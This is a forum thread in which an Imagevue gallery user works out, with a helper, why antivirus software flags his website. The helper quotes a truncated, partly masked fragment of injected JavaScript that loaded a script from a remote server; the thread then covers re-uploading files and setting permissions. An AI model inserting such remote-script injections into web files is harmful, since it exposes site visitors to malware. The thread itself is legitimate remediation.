X3Photo Gallery Forums

abertrande · 11 Jan 2014, 13:59

Hi,

A client told me he could not see my website (http://www.abertrande.com)
its antivirus reports a file malvaillant
I'm on mac and I don't see this problem

12/01/14 : I tried to connected me to my website with windows system : folder iv-includes infected (report avast antivirus)
I have delete my "www" folder and I have reinstalled Imagevue (2.8.10.3) with your procedure (https://www.photo.gallery/documentation/upgrade-imagevue/) - I have changed my ftp password but I have the same problem
My clients and me don't understand what's happens

Arnaud

13 Jan 2014, 00:20

I did some research, and found the script where something had been injected:
http://www.abertrande.com/iv-includes/a ... sewheel.js

Compare it to the authentic Imagevue script and how it looks from within our ZIP file:
https://www.photo.gallery/demo/x2/iv-include ... sewheel.js

As you can see, there is some code:

document.write('<script src="*******webxpress.co.php53-17 ...

I am not sure what this does or tries to do, but I can see your website makes some calls to scripts on that server. If you recently upgraded, I am not sure how it got there ... Either your admin was not properly passworded, or maybe you were using an older version of Imagevue? In either case, delete this file and re-upload it, and check that the local files in your ZIP are clean ... Check the date at which time this file was last modified on your server?

abertrande · 13 Jan 2014, 03:45

Thank for you reply

" Either your admin was not properly passworded,"
I have changed the password with filezilla

"maybe you were using an older version of Imagevue?"
i have installed the last version 2.8.10.3 the same as I had before

Today I have re-upload the iv-includes folder (I have download the version on your site)
I have the same problem..no changed

abertrande · 13 Jan 2014, 05:30

Update 13/01/14 11:28
...I have re upload all folders and Powerpack too
I have changed all password...now it's ok...I think

13 Jan 2014, 10:18

Yes, its fixed now and does not make any remote calls ... I would be cautious though, as someone must have been able to access and upload or edit a file earlier somehow. Check the file mentioned earlier once in a while to make sure it does not get edited. Did you replace everything in the Imagevue folder except your content folder?

abertrande · 13 Jan 2014, 10:55

yes I do not understand what happened
I changed all passwords
I changed all folders except "content" and "iv-config"
maybe you can help me to choose the rights for files with filezilla
for now:
www: 744
iv-includes et iv-admin: 700
the rest: 744
thank a lot

14 Jan 2014, 01:27

Normally, you should not change permissions on any folders except the ones where Imagevue needs to write ... that would be the /iv-config/ folder and the /content/ folder. The other folders should remain in your servers default permission state on upload ...

abertrande · 14 Jan 2014, 02:56

ok
Thank a lot for your help

X3Photo Gallery Forums

My Website infected on windows8 posts

My Website infected on windows

Re: My Website infected on windows

Re: My Website infected on windows

Re: My Website infected on windows

Re: My Website infected on windows

Re: My Website infected on windows

Re: My Website infected on windows

Re: My Website infected on windows